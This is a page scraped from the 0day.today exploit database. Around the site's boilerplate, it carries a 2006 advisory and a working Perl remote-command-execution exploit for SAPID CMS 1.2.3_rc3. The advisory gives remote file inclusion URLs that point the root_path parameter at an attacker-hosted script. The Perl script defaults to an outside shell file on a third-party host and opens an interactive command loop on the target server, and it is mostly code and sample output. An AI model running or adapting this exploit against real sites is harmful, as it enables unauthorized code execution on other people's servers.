0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit
=============================================================== SAPID CMS <= 1.2.3_rc3 (rootpath) Remote Code Execution Exploit =============================================================== ######################################################################### # Title: SAPID CMS Multiple remote Command Execution Vulnerabilities # # Discovered: 06 Aout 2006 # # Published : 08 Aout 2006 # # MorX Security Research Team # # http://www.morx.org # # Vendor : SAPID CMS # # Version : 123 rc3 () # # Website : http://sapid.sourceforge.net # # Severity: Critical # # Details: # # # [+] Remote File Inclusion # # 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 ) # # if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded"); # include($root_path."usr/system/common_extfunctions.inc.php"); } # # 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 ) # # if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded"); # include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); } # # $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files # # [-] Exploit : # # http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd # # http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd # #====================================== # Poc Remote Command Execution Exploit: #====================================== # # # C:\>perl sapid.pl http://127.0.0.1 # # =============================================================== # = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit = # =============================================================== # simo64@morx.org :~$ id; ls # uid=48(apache) gid=48(apache) groups=48(apache) # get_calendar.inc.php # get_filter_list.inc.php # get_gb_records.inc.php # get_infochannelfilter.inc.php # get_infochannel.inc.php # get_rss.inc.php # get_searchresults.inc.php # get_survey.inc.php # get_track.inc.php # get_tree.inc.php # soap_call.inc.php # simo64@morx.org :~$ exit # Enjoy ! # #!/usr/bin/perl use LWP::Simple; print "\n===============================================================\n"; print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n"; print "===============================================================\n"; print "= MorX Security Research Team =\n"; print "===============================================================\n\n"; my $targ,$rsh,$path,$con,$cmd,$data,$getit ; $targ = $ARGV[0]; $rsh = $ARGV[1]; if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";} if(!@ARGV) { &usage;exit(0);} $targ = $ARGV[0]; chomp($targ); chomp($rsh); $path = $targ."/usr/extensions/get_infochannel.inc.php"; $con = get($path) || die "[-]Cannot connect to Host"; sub usage(){ print "Usage : perl $0 host/path [OPTION]\n\n"; print "Exemples : perl $0 http://127.0.0.1\n"; print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n"; } while () { print "simo64\@morx.org :~\$ "; chomp($cmd=<STDIN>); if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);} $getit = $path."?root_path=".$rsh."?&cmd=".$cmd; $data=get($getit); if($cmd eq ""){ print "Please enter command !\n"; } else{ print $data ;} } # 0day.today [2024-11-15] #